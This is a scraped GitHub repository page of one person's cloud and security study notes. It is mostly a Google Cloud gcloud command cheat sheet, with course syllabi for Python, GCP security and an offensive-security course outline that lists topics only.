GithubHelp home page GithubHelp logo

cheatsheet's Introduction

Hey! Jymit here.

  • 🤔 It's pronouced Jim-it
  • 💻 In the past ive worked closely on full stack Open Source Software Engineering notably @ Zimbra, Elastic
  • 🛡️ At present working in SecOps Security Engineering at scale
  • 🔭 Working on consolidating some years of notes as well as some of the new stuff im learning and fun into an organised tidy space. Trying and failing to drop daily commits in 2022. Missed a bunch due to unplanned circumstances.
  • 🌱 I have an interest in macOS security research
  • 🤔 To which, I’m always looking for any new knowledge to do with macOS internals and security - Attended OBTSv5 and looking forward to OBTSv6.
  • ⚡ I like to solve problems, I like to help others solve problems they may have, be it people, software, network, architecture, security...
  • 💬 Ask me Anything
  • 📫 How to reach me 🤔. Where can you find me first?

Currently Research Learning

macOS Security Research

CVEs

WIP - hopefully soon!?

Technical Writeups in progress

WIP time permitting - Hoping to draft a couple in the next 9-12 months on medium, current ideas are for non technical pieces, thinking social anxiety and working in tech, leadership styles, and empathy as a leader.

Something about nothing

  • Life Long Learning (a must)
  • There cannot be any learning without teaching or mentoring (reach out to talk about tech and cyber). Hoping to start doing even more of both in 2023-24, stay tuned.
  • Some SANS, Some GIACs (who doesnt now a days)
  • Along with some experience in different tech spaces

To improve the below as time goes on

To Do list (areas I have or am reading about and or want to pursue, implement in some shape or form)

  • macOS internals / malware / writing and learning my own escapes
  • Working out time complexity because being able to think or work like a swe is never a bad idea

Recent reading, recommendations

  • Apple Endpoint Security Framework ESF - Talk from BSides Munich by Connor Morley
  • Sec updates from AWS - filter by security tool of choice - eg. AWS Security Hub launches 7 new security controls

cheatsheet's People

Contributors

jymit avatar

Stargazers

 avatar  avatar

Watchers

 avatar

cheatsheet's Issues

Google Crash Course on Python

wk1
Navigate the Coursera platform and find resources for help
Define what a programming language is and what syntax means
Define what a script is and how it applies to automation
List some of the benefits of the Python programming language
Utilize basic functions and keywords to display data and perform arithmetic operations

wk2
Differentiate and convert between different data types utilizing variables
Define and call functions utilizing parameters and return data
Refactor code and write comments to reduce complexity and enhance code readability and code reuse
Compare values using equality operators and logical operators
Build complex branching scripts utilizing if, else and elif statements

wk3
Implement while loops to continuously execute code
Identify and fix infinite loops when using while loops
Utilize for loops to iterate over sets of data
Use the range() function to control for loops
Identify and correct common errors when using loops

wk4
Manipulate strings using indexing, slicing, and formatting
Use lists and tuples to store, reference, and manipulate data
Leverage dictionaries to store more complex data, reference data by keys, and manipulate data stored
Combine these data types to construct complex data structures

wk5
Demonstrate object-oriented programming using classes and objects
Implement classes with custom attributes and methods
Write docstrings to document classes and methods
Leverage inheritance to reduce code duplication
Import and use Python modules to access powerful classes and methods

wk6
Tackle more complex problems from the ground up using a framework
Formulate a problem statement to understand the inputs and outputs of a script
Conduct research into options for tackling the problem
Plan an approach to solving the problem
Write a complex script in order to implement a solution

pydevops/gcloud_cheat_sheet.md

Table of Contents

0.1. References

0.2. Other cheatsheets

0.3. Manage multiple gcloud config configurations

gcloud config configurations create pythonrocks
gcloud config configurations list
gcloud config configurations activate pythonrocks
gcloud config set core/account [email protected]
gcloud projects list
gcloud config set project mygcp-demo

0.3.1. Switch gcloud context with gcloud config

gcloud config list
gcloud config set account [email protected] 
gcloud config set project mygcp-demo
gcloud config set compute/region us-west1
gcloud config set compute/zone us-west1-a
alias demo='gcloud config set account [email protected] && gcloud config set project mygcp-demo && gcloud config set compute/region us-west1 && gcloud config set compute/zone us-west1-a'

cluster=$(gcloud config get-value container/cluster 2> /dev/null)
zone=$(gcloud config get-value compute/zone 2> /dev/null)
project=$(gcloud config get-value core/project 2> /dev/null)

#switch project based on the name
gcloud config set project $(gcloud projects list --filter='name:wordpress-dev' --format='value(project_id)')

command -v gcloud >/dev/null 2>&1 || { \
 echo >&2 "I require gcloud but it's not installed.  Aborting."; exit 1; }

REGION=$(gcloud config get-value compute/region)
if [[ -z "${REGION}" ]]; then
    echo "https://cloud.google.com/compute/docs/regions-zones/changing-default-zone-region" 1>&2
    echo "gcloud cli must be configured with a default region." 1>&2
    echo "run 'gcloud config set compute/region REGION'." 1>&2
    echo "replace 'REGION' with the region name like us-west1." 1>&2
    exit 1;
fi

0.4. Auth

gcloud auth list
# to authenticate with a user identity (via web flow) which then authorizes gcloud and other SDK tools to access Google Cloud Platform.
gcloud auth login
# Service Account: to authenticate with a user identity (via a web flow) but using the credentials as a proxy for a service account.
gcloud auth application-default login 
gcloud auth activate-service-account --key-file=sa_key.json
# use GOOGLE_APPLICATION_CREDENTIALS pointing to JSON key

kubectl uses OAuth token generated by

  • gcloud config config-helper --format json
  • gcloud config config-helper --format='value(credential.access_token)'
  • gcloud auth print-access-token generates new token

0.5. info

gcloud info --format flattened
export PROJECT=$(gcloud info --format='value(config.project)')

0.6. projects

# various way to get project_id
PROJECT_ID=$(gcloud config get-value core/project 2>/dev/null)
PROJECT_ID=$(gcloud config list project --format='value(core.project)')
PROJECT_ID=$(gcloud info --format='value(config.project)')

# get project_number given project_id or name
gcloud projects list --filter="project_id:${PROJECT_ID}"  --format='value(project_number)'
gcloud projects list --filter="name:${project_name}"  --format='value(project_number)'

0.7. zones & regions

To return a list of zones given a region

gcloud compute zones list --filter=region:us-central1
# list regions
gcloud compute regions list

0.8. organization

ORG_ID=$(gcloud organizations list --format 'value(ID)')
# list top level folders
gcloud resource-manager folders list --organization=$ORG_ID
# list sub folders given upper level folder id
gcloud resource-manager folders list --folder=$FOLDER_ID
# get iam policy for the folder
gcloud resource-manager folders get-iam-policy $FOLDER_ID

# grant roles to a user
ORGANIZATION_ADMIN_ADDRESS='user:[email protected]'
gcloud resource-manager folders add-iam-policy-binding ${folder_id} \
  --member=${ORGANIZATION_ADMIN_ADDRESS} \
  --role=roles/resourcemanager.folderAdmin
gcloud resource-manager folders add-iam-policy-binding ${folder_id} \
  --member=${ORGANIZATION_ADMIN_ADDRESS} \
  --role=roles/storage.admin
gcloud resource-manager folders add-iam-policy-binding ${folder_id} \
  --member=${ORGANIZATION_ADMIN_ADDRESS} \
  --role=roles/billing.projectManager

0.9. billing

gcloud organizations list
gcloud beta billing accounts list
# link a billing account with a project, assuming the user or service account has "Billing Account User" role. 
gcloud beta billing projects link ${project_id} \
            --billing-account ${ORGANIZATION_BILLING_ACCOUNT}

0.10. iam

gcloud iam roles describe roles/container.admin

gcloud iam list-testable-permissions <uri>
e.g gcloud iam list-testable-permissions //cloudresourcemanager.googleapis.com/projects/$PROJECT_ID

gcloud iam list-grantable-roles <uri>
e.g. 
gcloud iam list-grantable-roles //cloudresourcemanager.googleapis.com/projects/$PROJECT_ID
gcloud iam list-grantable-roles https://www.googleapis.com/compute/v1/projects/$PROJECT_ID/zones/us-central1-a/instances/iowa1

# get uri e.g.
gcloud projects list --uri

0.11. service account

0.11.1. as an identity

export SA_EMAIL=$(gcloud iam service-accounts list \
    --filter="displayName:jenkins" --format='value(email)')
export PROJECT=$(gcloud info --format='value(config.project)')

# creaate and list sa
gcloud iam service-accounts create jenkins --display-name jenkins
gcloud iam service-accounts list
gcloud iam service-accounts list   --filter='email ~ [0-9]*-compute@.*'   --format='table(email)'

# create & list sa key  
gcloud iam service-accounts keys create jenkins-sa.json --iam-account $SA_EMAIL    
gcloud iam service-accounts keys list --iam-account=vault-admin@<project_id>.iam.gserviceaccount.com


 gcloud projects get-iam-policy ${PROJECT} --flatten="bindings[].members" --filter="bindings.members:serviceAccount:terraform@${PROJECT_ID}.iam.gserviceaccount.com"
 
gcloud projects add-iam-policy-binding $PROJECT  --role roles/storage.admin \
    --member serviceAccount:$SA_EMAIL
gcloud projects add-iam-policy-binding $PROJECT --role roles/compute.instanceAdmin.v1 \
    --member serviceAccount:$SA_EMAIL
gcloud projects add-iam-policy-binding $PROJECT --role roles/compute.networkAdmin \
    --member serviceAccount:$SA_EMAIL
gcloud projects add-iam-policy-binding $PROJECT --role roles/compute.securityAdmin \
    --member serviceAccount:$SA_EMAIL
gcloud projects add-iam-policy-binding $PROJECT --role roles/iam.serviceAccountActor \
    --member serviceAccount:$SA_EMAIL

0.11.2. service account as a resource

gcloud iam service-accounts get-iam-policy <sa_email>, eg. 
gcloud iam service-accounts get-iam-policy secret-accessor-dev@$PROJECT_ID.iam.gserviceaccount.com --project $PROJECT_ID
bindings:
- members:
  - serviceAccount:<project-id>.svc.id.goog[default/secret-accessor-dev]
  role: roles/iam.workloadIdentityUser
etag: BwWhFqqv9aQ=
version: 1

gcloud iam service-accounts add-iam-policy-binding [email protected] --member='serviceAccount:[email protected]' --role='roles/iam.serviceAccountActor'
# user:[email protected] impersonate as a svc account terraform@${PROJECT_ID}.iam.gserviceaccount.com
gcloud iam service-accounts add-iam-policy-binding  terraform@${PROJECT_ID}.iam.gserviceaccount.com --member=user:[email protected] --role roles/iam.serviceAccountTokenCreator
gcloud container clusters list --impersonate-service-account=terraform@${PROJECT_ID}.iam.gserviceaccount.com

0.11.3. GCS bucket level

gsutil iam get gs://${BUCKET_NAME}  -p ${PROJECT_ID}
COMPUTE_ENGINE_SA_EMAIL=$(gcloud iam service-accounts list --filter="name:Compute Engine default service account" --format "value(email)")
gsutil iam ch serviceAccount:${COMPUTE_ENGINE_SA_EMAIL}:objectViewer gs://${BUCKET_NAME}

0.11.4. Custom Roles

# list predefined roles
gcloud iam roles list
# list custom roles
gcloud iam roles list --project $PROJECT_ID

# create custom role in the following 2 ways, either on project level (--project [PROJECT_ID]) or org level (--organization [ORGANIZATION_ID])
1. gcloud iam roles create editor --project $PROJECT_ID --file role-definition.yaml
2. gcloud iam roles create viewer --project $PROJECT_ID --title "Role Viewer" --description "Custom role description." --permissions compute.instances.get,compu
te.instances.list --stage ALPHA

0.12. App engine

0.13. Cloud build

# user defined
gcloud builds submit --config=cloudbuild.yaml --substitutions=_BRANCH_NAME=foo,_BUILD_NUMBER=1 .

# override built in TAG_NAME
gcloud builds submit --config=cloudbuild.yaml --substitutions=TAG_NAME=v1.0.1

0.13.1. Cloud build trigger GCE rolling replace/start

steps:
- name: 'gcr.io/cloud-builders/docker'
  args: [ 'build', '-t', 'gcr.io/$PROJECT_ID/gcp-cloudbuild-gce-angular', '.' ]
- name: 'gcr.io/cloud-builders/gcloud'
  args: [ 'beta', 'compute', 'instance-groups', 'managed', 'rolling-action', 'restart', 'gce-angular-instance-group', '--zone=us-east1-b' ]
images:
- 'gcr.io/$PROJECT_ID/gcp-cloudbuild-gce-angular'

0.14. KMS

# list all keyrings 
gcloud kms keyrings list --location global
# list all keys in my_key_ring
gcloud kms keys list --keyring my_key_ring --location global

# grant KMS IAM permission to a sv account $USER_EMAIL 
gcloud kms keyrings add-iam-policy-binding $KEYRING_NAME \
    --location global \
    --member user:$USER_EMAIL \
    --role roles/cloudkms.admin
gcloud kms keyrings add-iam-policy-binding $KEYRING_NAME \
    --location global \
    --member user:$USER_EMAIL \
    --role roles/cloudkms.cryptoKeyEncrypterDecrypter
    
# Encrypt and Decrypt in REST API
curl -v "https://cloudkms.googleapis.com/v1/projects/$DEVSHELL_PROJECT_ID/locations/global/keyRings/$KEYRING_NAME/cryptoKeys/$CRYPTOKEY_NAME:encrypt" \
  -d "{\"plaintext\":\"$PLAINTEXT\"}" \
  -H "Authorization:Bearer $(gcloud auth application-default print-access-token)"\
  -H "Content-Type:application/json" \
| jq .ciphertext -r > 1.encrypted

curl -v "https://cloudkms.googleapis.com/v1/projects/$DEVSHELL_PROJECT_ID/locations/global/keyRings/$KEYRING_NAME/cryptoKeys/$CRYPTOKEY_NAME:decrypt" \
  -d "{\"ciphertext\":\"$(cat 1.encrypted)\"}" \
  -H "Authorization:Bearer $(gcloud auth application-default print-access-token)"\
  -H "Content-Type:application/json" \
| jq .plaintext -r | base64 -d    

0.15. Secret Manager

# create a secret
gcloud secrets create SECRET_NAME --replication-policy="automatic"
#create a secret version
gcloud secrets versions add "SECRET_NAME" --data-file="/path/to/file.txt"
# list
gcloud secrets list
# read
gcloud secrets versions access latest --secret=my_ssh_private_key
#update the labels (metadata) of a secret
gcloud secrets update SECRET_NAME --update-labels=KEY=VALUE

0.16. Compute Engine

0.16.1. gcloud command for creating an instance?

from web console

gcloud compute instances create [INSTANCE_NAME] \
  --image-family [IMAGE_FAMILY] \
  --image-project [IMAGE_PROJECT] \
  --create-disk image=[DISK_IMAGE],image-project=[DISK_IMAGE_PROJECT],size=[SIZE_GB],type=[DISK_TYPE]
  
gcloud compute instances create micro1 --zone=us-west1-a --machine-type=f1-micro --subnet=default --network-tier=PREMIUM --maintenance-policy=MIGRATE --service-account=398028291895-compute@developer.gserviceaccount.com --scopes=https://www.googleapis.com/auth/devstorage.read_only,https://www.googleapis.com/auth/logging.write,https://www.googleapis.com/auth/monitoring.write,https://www.googleapis.com/auth/servicecontrol,https://www.googleapis.com/auth/service.management.readonly,https://www.googleapis.com/auth/trace.append --min-cpu-platform=Automatic --image=debian-9-stretch-v20180510 --image-project=debian-cloud --boot-disk-size=10GB --boot-disk-type=pd-standard --boot-disk-device-name=micro1

0.16.2. list compute images

gcloud compute images list --filter=name:debian --uri
https://www.googleapis.com/compute/v1/projects/debian-cloud/global/images/debian-8-jessie-v20180109
https://www.googleapis.com/compute/v1/projects/debian-cloud/global/images/debian-9-stretch-v20180105

# Use the following command to see available non-Shielded VM Windows Server images
gcloud compute images list --project windows-cloud --no-standard-images
# Use the following command to see a list of available Shielded VM images, including Windows images
gcloud compute images list --project gce-uefi-images --no-standard-images

0.16.3. list an instance

gcloud compute instances list --filter="zone:us-central1-a"
gcloud compute instances list --project=dev --filter="name~^es"
gcloud compute instances list --project=dev --filter=name:kafka --format="value(name,INTERNAL_IP)"
gcloud compute instances list --filter=tags:kafka-node
gcloud compute instances list --filter='machineType:g1-small'

0.16.4. move instance

gcloud compute instances move <instance_wanna_move> --destination-zone=us-central1-a --zone=us-central1-c

0.16.5. ssh & scp

#--verbosity=debug is great for debugging, showing the SSH command 
# the following is a real word example for running a bastion server that talks to a GKE cluster (master authorized network)
gcloud compute ssh --verbosity=debug <instance_name> --command "kubectl get nodes"

gcloud compute scp  --recurse ../manifest <instance_name>:

0.16.6. SSH via IAP

# find out access-config-name's name
gcloud compute instances describe oregon1
# remove the external IP
gcloud compute instances delete-access-config  oregon1 --access-config-name "External NAT"
# connect via IAP, assuming the IAP is granted to the account used for login. 
gcloud beta compute ssh oregon1 --tunnel-through-iap

0.16.7. ssh port forwarding for elasticsearch

gcloud compute --project "foo" ssh --zone "us-central1-c" "elasticsearch-1"  --ssh-flag="-L localhost:9200:localhost:9200"

The 2nd localhost is relative to elasticsearch-1`

0.16.8. ssh reverse port forwarding

for example, how to connect to home server's flask server (tcp port 5000) for a demo or a local game server in development

GOOGLE_CLOUD_PROJECT=$(gcloud config get-value project)
gcloud compute --project "${GOOGLE_CLOUD_PROJECT}" ssh --zone "us-west1-c" --ssh-flag="-v -N -R :5000:localhost:5000" "google_cloud_bastion_server"

0.16.9. generate ssh config

gcloud compute config-ssh

0.16.10. Windows RDP reset windows password

returns the IP and password for creating the RDP connection.

gcloud compute reset-windows-password instance --user=jdoe

ip_address: 104.199.119.166
password:   Ks(;_gx7Bf2d.NP
username:   jode

0.16.11. debugging

0.16.12. instance level metadata

curl -s "http://metadata.google.internal/computeMetadata/v1/instance/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
leader=$(curl -s "http://metadata.google.internal/computeMetadata/v1/instance/attributes/leader" -H "Metadata-Flavor: Google")

0.16.13. project level metadata

gcloud compute project-info describe
gcloud compute project-info describe --flatten="commonInstanceMetadata[]"

0.16.14. instances, template, target-pool and instance group

cat << EOF > startup.sh
#! /bin/bash
apt-get update
apt-get install -y nginx
service nginx start
sed -i -- 's/nginx/Google Cloud Platform - '"\$HOSTNAME"'/' /var/www/html/index.nginx-debian.html
EOF

gcloud compute instance-templates create nginx-template  --metadata-from-file startup-script=startup.sh
gcloud compute target-pools create nginx-pool
gcloud compute instance-groups managed create nginx-group \
         --base-instance-name nginx \
         --size 2 \
         --template nginx-template \
         --target-pool nginx-pool

0.16.15. MIG with startup and shutdown scripts

https://cloud.google.com/vpc/docs/special-configurations#multiple-natgateways

gsutil cp gs://nat-gw-template/startup.sh .

gcloud compute instance-templates create nat-1 \
    --machine-type n1-standard-2 --can-ip-forward --tags natgw \
    --metadata-from-file=startup-script=startup.sh --address $nat_1_ip

gcloud compute instance-templates create nat-2 \
    --machine-type n1-standard-2 --can-ip-forward --tags natgw \
    --metadata-from-file=startup-script=startup.sh  --address $nat_2_ip

0.16.16. disk snapshot

gcloud compute disks snapshot kafka-data1-1 --async --snapshot-names=kafka-data-1 --project project_a --zone us-west1-a
Use [gcloud compute operations describe URI] command to check the status of the operation(s).

0.16.17. regional disk

 gcloud beta compute instance attach-disk micro1 --disk pd-west1 --disk-scope regional

0.17. Networking

0.17.1. network and subnets

 gcloud compute networks create privatenet --subnet-mode=custom
 gcloud compute networks subnets create privatesubnet-us --network=privatenet --region=us-central1 --range=172.16.0.0/24
 gcloud compute networks subnets create privatesubnet-eu --network=privatenet --region=europe-west1 --range=172.20.0.0/20
 gcloud compute networks subnets list --sort-by=NETWORK

0.17.2. route

tag the instances with no-ips

gcloud compute instances add-tags existing-instance --tags no-ip
gcloud compute routes create no-ip-internet-route \
    --network custom-network1 \
    --destination-range 0.0.0.0/0 \
    --next-hop-instance nat-gateway \
    --next-hop-instance-zone us-central1-a \
    --tags no-ip --priority 800

0.17.3. firewall rules

# allow SSH, RDP and ICMP for the given network
gcloud compute firewall-rules create managementnet-allow-icmp-ssh-rdp --direction=INGRESS --priority=1000 --network=managementnet --action=ALLOW --rules=tcp:22,3389,icmp --source-ranges=0.0.0.0/0
# allow internal from given source range
gcloud compute firewall-rules create mynetwork-allow-internal --network \
mynetwork --action ALLOW --direction INGRESS --rules all \
--source-ranges 10.128.0.0/9
gcloud compute firewall-rules list --filter="network:mynetwork"

## DENY
gcloud compute firewall-rules create mynetwork-deny-icmp \
--network mynetwork --action DENY --direction EGRESS --rules icmp \
--destination-ranges 10.132.0.2 --priority 500
gcloud compute firewall-rules list \
--filter="network:mynetwork AND name=mynetwork-deny-icmp"

# sort-by
gcloud compute firewall-rules list --sort-by=NETWORK

0.17.4. layer 4 network lb

gcloud compute firewall-rules create www-firewall --allow tcp:80
gcloud compute forwarding-rules create nginx-lb \
         --region us-central1 \
         --ports=80 \
         --target-pool nginx-pool
         
gcloud compute firewall-rules list --sort-by=NETWORK

0.17.5. layer 7 http lb

gcloud compute http-health-checks create http-basic-check
gcloud compute instance-groups managed \
       set-named-ports nginx-group \
       --named-ports http:80

gcloud compute backend-services create nginx-backend \
      --protocol HTTP --http-health-checks http-basic-check --global
      
gcloud compute backend-services add-backend nginx-backend \
    --instance-group nginx-group \
    --instance-group-zone us-central1-a \
    --global  

gcloud compute url-maps create web-map \
    --default-service nginx-backend

gcloud compute target-http-proxies create http-lb-proxy \
    --url-map web-map
    
gcloud compute forwarding-rules create http-content-rule \
        --global \
        --target-http-proxy http-lb-proxy \
        --ports 80
gcloud compute forwarding-rules list

0.17.6. forwarding-rules

gcloud compute forwarding-rules list --filter=$(dig +short <dns_name>)
gcloud compute forwarding-rules describe my-forwardingrule --region us-central1
gcloud compute forwarding-rules describe my-http-forwardingrule --global

0.17.7. address

# get the external IP address of the instance
gcloud compute instances describe single-node \
     --format='value(networkInterfaces.accessConfigs[0].natIP)
     
gcloud compute addresses describe https-lb --global --format json

# list all IP addresses
gcloud projects list --format='value(project_id)' | xargs -I {} gcloud compute addresses list --format='value(address)' --project {}  2>/dev/null | sort | uniq -c

0.18. interconnect

# list Google Compute Engine interconnect locations
gcloud compute interconnects locations list

0.19. GCP managed ssl certificate

gcloud beta compute ssl-certificates create example-mydomain --domains example.mydomain.com
gcloud beta compute ssl-certificates list
gcloud beta compute ssl-certificates describe example-mydomain
# It takes 30mins+ to provision the TLS, one of conditions is the target-https-proxies needs to be associated with the cert.
gcloud beta compute target-https-proxies list

0.20. StackDriver logging

gcloud logging read "timestamp >= \"2018-04-19T00:30:00Z\"  and logName=projects/${project_id}/logs/requests and resource.type=http_load_balancer" --format="csv(httpRequest.remoteIp,httpRequest.requestUrl,timestamp)" --project=${project_id}

0.21. Service

0.21.1. list service available

gcloud services list --available

0.21.2. Enable Service

# chain 
gcloud services enable cloudapis.googleapis.com && \
cloudresourcemanager.googleapis.com && \
compute.googleapis.com 

# or not chain
gcloud services enable container.googleapis.com
gcloud services enable containerregistry.googleapis.com
gcloud services enable cloudbuild.googleapis.com
gcloud services enable iam.googleapis.com
gcloud services enable logging.googleapis.com
gcloud services enable monitoring.googleapis.com
gcloud services enable storage-api.googleapis.com
gcloud services enable storage-component.googleapis.com
gcloud services enable sourcerepo.googleapis.com
function enable-service() {
  SERVICE=$1
  if [[ $(gcloud services list --format="value(serviceConfig.name)" \
                                --filter="serviceConfig.name:$SERVICE" 2>&1) != \
                                "$SERVICE" ]]; then
    echo "Enabling $SERVICE"
    gcloud services enable $SERVICE
  else
    echo "$SERVICE is already enabled"
  fi
}

enable-service container.googleapis.com

0.22. Client libraries you can use to connect to Google APIs

0.23. chaining gcloud commands

gcloud compute forwarding-rules list --format 'value(NAME)' \
| xargs -I {}  gcloud compute forwarding-rules delete {}  --region us-west1 -q

gcloud projects list --format='value(project_id)' \
| xargs -I {} gcloud compute addresses list --format='value(address)' --project {}  2>/dev/null | sort | uniq -c

gcloud compute instances list --filter=elasticsearch --format='value(NAME)' \
| xargs -I {} -p gcloud compute instances stop {}
gcloud compute instances list --filter=elasticsearch --format='value(INTERNAL_IP)' \
| xargs -I {} ssh {} "sudo chef-client"

# delete non default routes
gcloud compute routes list --filter="NOT network=default" --format='value(NAME)' \
| xargs -I {} gcloud compute routes delete -q {}

0.24. one liner to purge GCR images given a date

DATE=2018-10-01
IMAGE=<project_id>/<image_name>
gcloud container images list-tags gcr.io/$IMAGE --limit=unlimited --sort-by=TIMESTAMP   \
--filter="NOT tags:* AND timestamp.datetime < '${DATE}'" --format='get(digest)' | \
while read digest;do gcloud container images delete -q --force-delete-tags gcr.io/$IMAGE@$digest ;done

0.25. GKE

# create a private cluster
gcloud beta container clusters create private-cluster \
    --private-cluster \
    --master-ipv4-cidr 172.16.0.16/28 \
    --enable-ip-alias \
    --create-subnetwork ""


gcloud compute networks subnets create my-subnet \
    --network default \
    --range 10.0.4.0/22 \
    --enable-private-ip-google-access \
    --region us-central1 \
    --secondary-range my-svc-range=10.0.32.0/20,my-pod-range=10.4.0.0/14

gcloud beta container clusters create private-cluster2 \
    --private-cluster \
    --enable-ip-alias \
    --master-ipv4-cidr 172.16.0.32/28 \
    --subnetwork my-subnet \
    --services-secondary-range-name my-svc-range \
    --cluster-secondary-range-name my-pod-range
 
 gcloud container clusters update private-cluster2 \
    --enable-master-authorized-networks \
    --master-authorized-networks <external_ip_of_kubectl_instance>
# create a GKE cluster with CloudRun,Istio, HPA enabled
gcloud beta container clusters create run-gke \
  --addons HorizontalPodAutoscaling,HttpLoadBalancing,Istio,CloudRun \
  --scopes cloud-platform \
  --zone us-central1-a \
  --machine-type n1-standard-4 \
  --enable-stackdriver-kubernetes \
  --no-enable-ip-alias
# create a VPC native cluster
gcloud container clusters create k1 \
--network custom-ip-vpc --subnetwork subnet-alias \
--enable-ip-alias --cluster-ipv4-cidr=/16   --services-ipv4-cidr=/22
# get the GKE endpoint
gcloud container clusters describe mycluster --format='get(endpoint)'
# generate a ~/.kube/config for private cluster with private endpoint
gcloud container clusters get-credentials private-cluster --zone us-central1-a --internal-ip

0.25.1. create a GKE cluster with label and query it later

gcloud container clusters create example-cluster --labels env=dev
gcloud container clusters list --filter resourceLabels.env=dev 

0.26. Cloud Run

# deploy a service on Cloud Run in us-central1 and allow unauthenticated user
gcloud beta run deploy --image gcr.io/${PROJECT-ID}/helloworld --platform managed --region us-central1 --allow-unauthenticated

# list services
gcloud beta run services list
# get endpoint url for a service
gcloud beta run services describe <service_name> --format="get(status.url)"

0.27. Machine Learning

brew install bat
gcloud ml language analyze-entities --content="Michelangelo Caravaggio, Italian painter, is known for 'The Calling of Saint Matthew'." | bat  -l json

0.28. Deployment Manager

GOOGLE FOSS DFIR

https://github.com/google/timesketch
https://github.com/google/timesketch/blob/master/docs/Installation.md
Ubuntu 18.04LTS Server edition

https://github.com/google/timesketch/blob/master/docs/EnablePlasoUpload.md

4 GB Memory / 80 GB Disk / SFO2 - Ubuntu 18.04.3 (LTS) x64
Works fine and install fail2ban too
*Can easily install Plaso (Log2Timeline) and Redis on this node (for HTTP uploads) which I did. 

*Be aware that the CSV generated may be unreasonably large. If this happens you will need to use the Slice option within psort to narrow down your date/time range. See man page for psort.py for usage info.

pydevops/dump_networks.sh

#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail

# For one project only
# Please make sure to run `gcloud config set project <project_id> first`

command -v gcloud >/dev/null 2>&1 || \
  { echo >&2 "I require gcloud but it's not installed. Aborting.";exit 1; }

PROJECT_ID=$(gcloud config list project --format 'value(core.project)')
if [ -z "${PROJECT_ID}" ]
  then echo >&2 "I require default project is set but it's not. Aborting."; exit 1;
fi

OUT=$PROJECT_ID.txt
cat /dev/null > $OUT
echo "**networks**" >> $OUT
gcloud compute networks list >> $OUT
echo "**subnets**" >> $OUT
gcloud compute networks subnets list --sort-by=NETWORK >> $OUT
echo "**routes**" >> $OUT
gcloud compute routes list --sort-by=NETWORK  >> $OUT
echo "**firewall-rules**" >> $OUT
gcloud compute firewall-rules list --sort-by=NETWORK >> $OUT

echo "##Please send the content of $OUT to us, thanks!##"

Security in Google Cloud Platform

=>
=> Security in Google Cloud Platform Specialization
=>

=> 1 Google Cloud Platform Fundamentals: Core Infrastructure
- GCP, GCE, GCS, GKE, GAE, BQ, ML
=> 2 Managing Security in Google Cloud Platform
- Cloud ID, IAM, VPC sec
=> 3 Security Best Practices in Google Cloud
- Service accounts, IAM roles, GCE best practices
=> 4 Mitigating Security Vulnerabilities on Google Cloud Platform
Protecting against Distributed Denial of Service Attacks
- Cloud Armor (App, DDOS defense)
- DLP API
- Security Command Center
- Stackdriver Monitoring and Logging
- Forseti


Cannot remember where this syllabus is from! #edit believe to be found from here: https://www.jellyfish.com/en-gb/training/courses/security-in-google-cloud-platform- which is not the one i want, to add the correct syllabus above this para, above the dashes.

Module 1: Foundations of GCP Security
Google Cloud's approach to security
The shared security responsibility model
Threats mitigated by Google and by GCP
Access Transparency

Module 2: Cloud Identity
Cloud Identity
Syncing with Microsoft Active Directory
Choosing between Google authentication and SAML-based SSO
GCP best practices

Module 3: Identity and Access Management
GCP Resource Manager: projects, folders, and organizations
GCP IAM roles, including custom roles
GCP IAM policies, including organization policies
GCP IAM best practices

Module 4: Configuring Google Virtual Private Cloud for Isolation and Security
Configuring VPC firewalls (both ingress and egress rules)
Load balancing and SSL policies
Private Google API access
SSL proxy use
Best practices for structuring VPC networks
Best security practices for VPNs
Security considerations for interconnect and peering options
Available security products from partners

Module 5: Monitoring, Logging, Auditing, and Scanning
Stackdriver monitoring and logging
VPC flow logs
Cloud audit logging
Deploying and Using Forseti

Module 6: Securing Compute Engine: techniques and best practices
Compute Engine service accounts, default and customer-defined
IAM roles for VMs
API scopes for VMs
Managing SSH keys for Linux VMs
Managing RDP logins for Windows VMs
Organization policy controls: trusted images, public IP address, disabling serial port
Encrypting VM images with customer-managed encryption keys and with customer-supplied encryption keys
Finding and remediating public access to VMs
VM best practices
Encrypting VM disks with customer-supplied encryption keys

Module 7: Securing cloud data: techniques and best practices
Cloud Storage and IAM permissions
Cloud Storage and ACLs
Auditing cloud data, including finding and remediating publicly accessible data
Signed Cloud Storage URLs
Signed policy documents
Encrypting Cloud Storage objects with customer-managed encryption keys and with customer-supplied encryption keys
Best practices, including deleting archived versions of objects after key rotation
BigQuery authorized views
BigQuery IAM roles
Best practices, including preferring IAM permissions over ACLs

Module 8: Protecting against Distributed Denial of Service Attacks: techniques and best practices
How DDoS attacks work
Mitigations: GCLB, Cloud CDN, autoscaling, VPC ingress and egress firewalls, Cloud Armor
Types of complementary partner products

Module 9: Application Security: techniques and best practices
Types of application security vulnerabilities
DoS protections in App Engine and Cloud Functions
Cloud Security Scanner
Threat: Identity and Oauth phishing
Identity Aware Proxy

Module 10: Content-related vulnerabilities: techniques and best practices
Threat: Ransomware
Mitigations: Backups, IAM, Data Loss Prevention API
Threats: Data misuse, privacy violations, sensitive/restricted/unacceptable content
Mitigations: Classifying content using Cloud ML APIs; scanning and redacting data using Data Loss Prevention API

G NOOB

Bringing more order to this madness

=>
=> Security in Google Cloud Platform Specialization
=>

=> 1 Google Cloud Platform Fundamentals: Core Infrastructure
- GCP, GCE, GCS, GKE, GAE, BQ, ML
=> 2 Managing Security in Google Cloud Platform
- Cloud ID, IAM, VPC sec
=> 3 Security Best Practices in Google Cloud
- Service accounts, IAM roles, GCE best practices
=> 4 Mitigating Security Vulnerabilities on Google Cloud Platform
Protecting against Distributed Denial of Service Attacks
- Cloud Armor (App, DDOS defense), DLP API, Security Command Center, Stackdriver Monitoring and Logging, Forseti

Udemy Offensive Security Engineering

https://github.com/3ndG4me/Offensive-Security-Engineering-Udemy

Section 1: Introduction
-> AWS Primer
Section 2: Networks Refresher
Section 3: Basics of Command and Control (C2)
-> Client/Server
-> Bind connection
-> Reverse connection: c2 server<-4444-client. msf bind_tcp
Section 4: Reverse VPN Tunnelling
-> AWS terraform
Section 5: Infrastructure Operations
-> Devops
-> Terraform
-> SaltStack (master/minion). SaltStack C
Section 6: Red Teams
-> TTPs. Threat emulation.
Section 7: Red Team Operations
Section 8: Scenarios Introduction
Section 9: Scenario 1 - Classic Exploitation
https://github.com/3ndG4me/Offensive-Security-Engineering-Udemy/tree/master/base-c2
Section 10: Scenario 2 - The Dropbox
post-exploit: Empire. Merlin.
